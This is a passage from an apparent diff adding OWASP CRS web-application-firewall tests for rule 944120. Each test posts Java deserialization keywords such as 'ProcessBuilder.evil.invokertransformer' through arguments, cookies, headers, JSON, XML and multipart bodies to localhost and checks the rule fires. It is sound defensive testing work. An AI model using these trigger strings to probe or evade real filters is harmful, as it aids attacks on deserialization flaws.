"Nested XML element value includes 
keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-45 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-46 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-47 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-48 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-49 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + 
{"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-50 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-51 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-52 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-53 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-54 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-55 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-56 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-57 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-58 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-59 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-60 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-61 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-62 + desc: "Content-Type text/plain 
includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-63 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-64 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-65 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-66 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-67 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-68 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-69 + desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-70 + desc: "Argument name includes keyword 
ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-71 + desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-72 + desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-73 + desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-74 + desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-75 + desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-76 + desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-77 + desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-78 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-79 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-80 + desc: "Content-Type application/json arg value includes keyword 
ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-81 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-82 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + 
log_contains: "id \"944120\"" + - test_title: 944120-83 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-84 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-85 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-86 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-87 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-88 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-89 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-90 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-91 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 